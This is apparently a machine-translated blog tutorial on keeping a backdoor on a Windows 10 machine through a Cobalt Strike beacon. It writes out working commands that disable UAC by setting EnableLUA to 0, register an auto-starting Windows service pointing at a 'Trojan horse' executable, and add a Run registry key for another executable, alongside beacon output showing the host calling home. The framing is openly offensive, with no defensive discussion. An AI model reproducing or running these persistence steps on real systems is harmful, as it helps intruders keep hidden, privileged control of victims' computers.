Lasting thinking on the backdoor of the registry

Prepare the environment
windows10 virtual machine

Cobalt Strike [Deployed here on Windows 10, the server is placed on the cloud]

The remote Trojan controlled the windows10 virtual machine, using Cobalt Strike

Enter beacon under Cobalt Strike

Comparison description [Executable files remain persistent backdoor]

Change the value of HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA to 0
Change this value to 0, so that operations on your computer are real administrators

Query registry information

shell reg query “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System”

EnableLUA is set to 1

EnableLUA is set to 0

beacon> shell sc create "test" binpath= "C:\Users\calmness\Desktop\ceshi.exe"  【Fill in your own Trojan horse path】
[*] Tasked beacon to run: sc create "test" binpath= "C:\Users\calmness\Desktop\ceshi.exe"
[+] host called home, sent: 94 bytes
[+] received output:
[SC] CreateService 成功
beacon> shell sc description "test"        【Set the description of the service】
[*] Tasked beacon to run: sc description "test" 
[+] host called home, sent: 59 bytes
[+] received output:
[SC] ChangeServiceConfig2 success
beacon> shell sc config "test" start= auto   【Set the service to start automatically】
[*] Tasked beacon to run: sc config "test" start= auto
[+] host called home, sent: 59 bytes
[+] received output:
[SC] ChangeServiceConfig success
beacon> shell net start "test"        [Start service]
[*] Tasked beacon to run: net start "test"
[+] host called home, sent: 47 bytes
[+] received output:


Insert it directly into the registry and become a self-starting file

Continue-add backdoor generation

shell reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” /v “calm” /t REG_SZ /d “C:\Users\calmness\calmnexx.exe” /f


Still online

add another point:

beacon> shell cmd /k dir

[*] Tasked beacon to run: cmd /k dir

[+] host called home, sent: 41 bytes

[+] received output:

The volume in drive C has no label

The serial number of the volume is 88B7-95BE

The directory of C:\Users\calmness\Desktop

2020/09/21 13:07 <DIR>.

End! ! !


